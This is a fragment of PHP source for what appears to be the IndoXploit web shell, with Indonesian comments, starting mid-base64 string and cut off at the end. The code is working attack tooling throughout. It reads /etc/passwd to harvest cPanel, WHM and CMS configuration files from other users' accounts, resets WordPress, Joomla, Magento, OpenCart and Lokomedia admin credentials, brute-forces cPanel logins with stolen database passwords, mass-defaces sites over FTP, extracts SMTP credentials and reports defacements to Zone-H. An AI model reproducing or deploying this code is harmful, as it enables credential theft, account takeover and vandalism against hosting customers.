bmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
$file = "pastigans_config/vhost.cin";
$handle = fopen($file ,"w+");
fwrite($handle ,base64_decode($vhost));
fclose($handle);
chmod($file, 0755);
if(exe("cd pastigans_config && ./vhost.cin")) {
echo "<center><a href='$link_config/pastigans_config'><font color=lime>Done</font></a></center>";
} else {
echo "<center><a href='$link_config/pastigans_config/vhost.cin'><font color=lime>Done</font></a></center>";
}
} else {
$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_idx) {
$user_config_dir = "/home/$user_idx/public_html/";
if(is_readable($user_config_dir)) {
$grab_config = array(
"/home/$user_idx/.my.cnf" => "cpanel",
"/home/$user_idx/.accesshash" => "WHM-accesshash",
"$user_config_dir/po-content/config.php" => "Popoji",
"$user_config_dir/vdo_config.php" => "Voodoo",
"$user_config_dir/bw-configs/config.ini" => "BosWeb",
"$user_config_dir/config/koneksi.php" => "Lokomedia",
"$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
"$user_config_dir/clientarea/configuration.php" => "WHMCS",
"$user_config_dir/whm/configuration.php" => "WHMCS",
"$user_config_dir/whmcs/configuration.php" => "WHMCS",
"$user_config_dir/forum/config.php" => "phpBB",
"$user_config_dir/sites/default/settings.php" => "Drupal",
"$user_config_dir/config/settings.inc.php" => "PrestaShop",
"$user_config_dir/app/etc/local.xml" => "Magento",
"$user_config_dir/joomla/configuration.php" => "Joomla",
"$user_config_dir/configuration.php" => "Joomla",
"$user_config_dir/wp/wp-config.php" => "WordPress",
"$user_config_dir/wordpress/wp-config.php" => "WordPress",
"$user_config_dir/wp-config.php" => "WordPress",
"$user_config_dir/admin/config.php" => "OpenCart",
"$user_config_dir/slconfig.php" => "Sitelok",
"$user_config_dir/application/config/database.php" => "Ellislab");
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("pastigans_config/$user_idx-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo "<center><a href='?dir=$dir/pastigans_config'><font color=lime>Done</font></a></center>";
}
} elseif($_GET['do'] == 'jumping') {
$i = 0;
echo "<div class='margin: 5px auto;'>";
if(preg_match("/hsphere/", $dir)) {
$urls = explode("
", $_POST['url']);
if(isset($_POST['jump'])) {
echo "<pre>";
foreach($urls as $url) {
$url = str_replace(array("http://","www."), "", strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc,"r");
while($gets = fgets($f)) {
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/$user";
if(is_dir($dir_user) === true) {
$url_user = $dir_user."/".$url;
if(is_readable($url_user)) {
$i++;
$jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
if(is_writable($url_user)) {
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
}
echo $jrw."<br>";
}
}
}
}
if($i == 0) {
} else {
echo "<br>Total ada ".$i." Kamar di ".$ip;
}
echo "</pre>";
} else {
echo '<center>
<form method="post">
List Domains: <br>
<textarea name="url" style="width: 500px; height: 250px;">';
$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
while($getss = fgets($fp)) {
echo $getss;
}
echo '</textarea><br>
<input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
</form></center>';
}
} elseif(preg_match("/vhosts|vhost/", $dir)) {
preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
$urls = explode("
", $_POST['url']);
if(isset($_POST['jump'])) {
echo "<pre>";
foreach($urls as $url) {
$url = str_replace("www.", "", $url);
$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
if(is_dir($web_vh) === true) {
if(is_readable($web_vh)) {
$i++;
$jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
if(is_writable($web_vh)) {
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
}
echo $jrw."<br>";
}
}
}
if($i == 0) {
} else {
echo "<br>Total ada ".$i." Kamar di ".$ip;
}
echo "</pre>";
} else {
echo '<center>
<form method="post">
List Domains: <br>
<textarea name="url" style="width: 500px; height: 250px;">';
bing("ip:$ip");
echo '</textarea><br>
<input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
</form></center>';
}
} else {
echo "<pre>";
$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_idx_jump) {
$user_jumping_dir = "/home/$user_idx_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
if(is_writable($user_jumping_dir)) {
$jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_idx_jump) {
echo " => ( <u>$dj</u> )<br>";
break;
}
}
}
} else {
echo "<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>Total ada ".$i." Kamar di ".$ip;
}
echo "</pre>";
}
echo "</div>";
} elseif($_GET['do'] == 'auto_edit_user') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
echo "username atau password harus lebih dari 6 karakter";
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = ambilkata($config,"host = '","'");
$dbuser = ambilkata($config,"user = '","'");
$dbpass = ambilkata($config,"password = '","'");
$dbname = ambilkata($config,"db = '","'");
$dbprefix = ambilkata($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Joomla<br>";
if($site == '') {
echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "Sitename => $site<br>";
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Wordpress<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Magento<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
$dbname = ambilkata($config,"'DB_DATABASE', '","'");
$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = ambilkata($config,"HTTP_SERVER', '","'");
if($target == '') {
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => OpenCart<br>";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
$dbhost = ambilkata($config,'server = "','"');
$dbuser = ambilkata($config,'username = "','"');
$dbpass = ambilkata($config,'password = "','"');
$dbname = ambilkata($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
if($target2 == '') {
$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
} else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
$url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
$url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
} else {
$url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
$url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
$url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
} else {
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
}
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Lokomedia<br>";
if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
echo $url_target2;
} else {
echo $url_target;
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
}
}
}
} else {
echo "<center>
<h1>Auto Edit User Config</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set User & Pass: <br>
<input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
<input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
</form>
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
";
}
} elseif($_GET['do'] == 'cpanel') {
if($_POST['crack']) {
$usercp = explode("
", $_POST['user_cp']);
$passcp = explode("
", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
} else {
$i++;
if(function_exists('posix_getpwuid')) {
$domain_cp = file_get_contents("/etc/named.conf");
if($domain_cp == '') {
$dom = "<font color=red>gabisa ambil nama domain nya</font>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
foreach($domains_cp[1] as $dj) {
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if($user_cp_url == $ucp) {
$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
break;
}
}
}
} else {
$dom = "<font color=red>function is Disable by system</font>";
}
echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
}
} else {
echo "<center>
<form method='post'>
USER: <br>
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while($getu = fgets($_usercp)) {
if($getu == '' || !$_usercp) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all("/(.*?):x:/", $getu, $u);
foreach($u[1] as $user_cp) {
if(is_dir("/home/$user_cp/public_html")) {
echo "$user_cp
";
}
}
}
}
echo "</textarea><br>
PASS: <br>
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass($dir) {
$pass = "";
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
if(preg_match("/WordPress/", $ambil)) {
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."
";
} elseif(preg_match("/JConfig|joomla/", $ambil)) {
$pass .= ambilkata($ambil,"password = '","'")."
";
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."
";
} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
$pass .= ambilkata($ambil,'password = "','"')."
";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."
";
} elseif(preg_match("/^[client]$/", $ambil)) {
preg_match("/password=(.*?)/", $ambil, $pass1);
if(preg_match('/"/', $pass1[1])) {
$pass1[1] = str_replace('"', "", $pass1[1]);
$pass .= $pass1[1]."
";
} else {
$pass .= $pass1[1]."
";
}
} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
$pass .= ambilkata($ambil,"db_password = '","'")."
";
}
}
echo $pass;
}
$cp_pass = cp_pass($dir);
echo $cp_pass;
echo "</textarea><br>
<input type='submit' name='crack' style='width: 450px;' value='Crack'>
</form>
<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
}
} elseif($_GET['do'] == 'domain'){
echo "<center><div><p align='center'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table><tr bgcolor=#333><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
} elseif($_GET['do'] == 'server'){
echo "<br><center><b>-=Server Security Informations=-</b><center><br>";
echo "<center><div class='tmpe'>
<table align='center' width='50%'><td><font color='#007700'>Kernel Version</font></td><td>";echo php_uname();
echo "<tr><td><font color='#007700'>Web Server</font></td><td>";echo $_SERVER["SERVER_SOFTWARE"];
echo "<tr><td><font color='#007700'>PHP Version</font></td><td>";echo phpversion(); echo " on "; echo php_sapi_name();
echo "<tr><td><font color='#007700'>Current User</font></td><td>";echo get_current_user();
echo "<tr><td><font color='#007700'>User ID</font></td><td>";echo getmyuid();
echo "<tr><td><font color='#007700'>Group</font></td><td>";echo getmygid();
echo "<tr><td><font color='#007700'>Cwd </font></td><td>";echo getcwd();
echo "<tr><td><font color='#007700'>Admin Server</font></td><td>";echo $_SERVER['SERVER_ADMIN'];
echo "<tr><td><font color='#007700'>Server Port</font></td><td>";echo $_SERVER['SERVER_PORT'];
echo "<tr><td><font color='#007700'>Server IP</font></td><td>";echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
echo "<tr><td><font color='#007700'>Client IP</font></td><td>";echo $_SERVER['REMOTE_ADDR'];
echo "<tr><td><font color='#007700'>cURL support</font></td><td>";echo function_exists('curl_version')?'Enabled':'No';
echo "<tr><td><font color='#007700'>Readable /etc/passwd</font></td><td>";echo @is_readable('/etc/passwd')?"Readable <a href='?action=moco'> [View]</a>":"Not Readable";
echo "<tr><td><font color='#007700'>Readable /etc/shadow</font></td><td>";echo @is_readable('/etc/shadow')?"Readable":"Not Readable";
$base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON <font color='#007700'>secure</font>":"OFF <font color='#007700'>not secure</font>";
echo "<tr><td><font color='#007700'>Open Base Dir</font></td><td><font class=txt>" . $base . "</font>";
echo "</table></div></center><br>";
} elseif($_GET['do'] == 'cpftp_auto') {
if($_POST['crack']) {
$usercp = explode("
", $_POST['user_cp']);
$passcp = explode("
", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
//
} else {
echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
$ftp_conn = ftp_connect($ip);
$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
if((!$ftp_login) || (!$ftp_conn)) {
echo "[+] <font color=red>Login Gagal</font><br><br>";
} else {
echo "[+] <font color=lime>Login Sukses</font><br>";
$fi = htmlspecialchars($_POST['file_deface']);
$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
if($deface) {
$i++;
echo "[+] <font color=lime>Deface Sukses</font><br>";
if(function_exists('posix_getpwuid')) {
$domain_cp = file_get_contents("/etc/named.conf");
if($domain_cp == '') {
echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
foreach($domains_cp[1] as $dj) {
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if($user_cp_url == $ucp) {
echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
break;
}
}
}
} else {
echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
}
} else {
echo "[-] <font color=red>Deface Gagal</font><br><br>";
}
}
//echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
}
} else {
echo "<center>
<form method='post'>
Filename: <br>
<input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
Deface Page: <br>
<input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
USER: <br>
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while($getu = fgets($_usercp)) {
if($getu == '' || !$_usercp) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all("/(.*?):x:/", $getu, $u);
foreach($u[1] as $user_cp) {
if(is_dir("/home/$user_cp/public_html")) {
echo "$user_cp
";
}
}
}
}
echo "</textarea><br>
PASS: <br>
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass($dir) {
$pass = "";
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
if(preg_match("/WordPress/", $ambil)) {
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."
";
} elseif(preg_match("/JConfig|joomla/", $ambil)) {
$pass .= ambilkata($ambil,"password = '","'")."
";
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."
";
} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
$pass .= ambilkata($ambil,'password = "','"')."
";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."
";
} elseif(preg_match("/client/", $ambil)) {
preg_match("/password=(.*)/", $ambil, $pass1);
if(preg_match('/"/', $pass1[1])) {
$pass1[1] = str_replace('"', "", $pass1[1]);
$pass .= $pass1[1]."
";
}
} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
$pass .= ambilkata($ambil,"db_password = '","'")."
";
}
}
echo $pass;
}
$cp_pass = cp_pass($dir);
echo $cp_pass;
echo "</textarea><br>
<input type='submit' name='crack' style='width: 450px;' value='Hajar'>
</form>
<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
}
} elseif($_GET['do'] == 'smtp') {
echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
function scj($dir) {
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
$ambil = str_replace("$", "", $ambil);
if(preg_match("/JConfig|joomla/", $ambil)) {
$smtp_host = ambilkata($ambil,"smtphost = '","'");
$smtp_auth = ambilkata($ambil,"smtpauth = '","'");
$smtp_user = ambilkata($ambil,"smtpuser = '","'");
$smtp_pass = ambilkata($ambil,"smtppass = '","'");
$smtp_port = ambilkata($ambil,"smtpport = '","'");
$smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
echo "SMTP port: <font color=lime>$smtp_port</font><br>";
echo "SMTP user: <font color=lime>$smtp_user</font><br>";
echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
}
}
}
$smpt_hunter = scj($dir);
echo $smpt_hunter;
} elseif($_GET['do'] == 'auto_wp') {
if($_POST['hajar']) {
$title = htmlspecialchars($_POST['new_title']);
$pn_title = str_replace(" ", "-", $title);
if($_POST['cek_edit'] == "Y") {
$script = $_POST['edit_content'];
} else {
$script = $title;
}
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/WordPress/", $config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."posts";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
$update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
$update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
echo "<div style='margin: 5px auto;'>";
if($target == '') {
echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
} else {
echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
}
if(!$update OR !$conn OR !$db) {
echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
} else {
echo "<font color=lime>sukses di ganti.</font><br>";
}
echo "</div>";
mysql_close($conn);
}
}
} else {
echo "<center>
<h1>Auto Edit Title+Content WordPress</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set Title: <br>
<input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
<textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
</form>
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
";
}
} elseif($_GET['do'] == 'zoneh') {
if($_POST['submit']) {
$domain = explode("
", $_POST['url']);
$nick = $_POST['nick'];
echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
function zoneh($url,$nick) {
$ch = curl_init("http://www.zone-h.com/notify/single");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
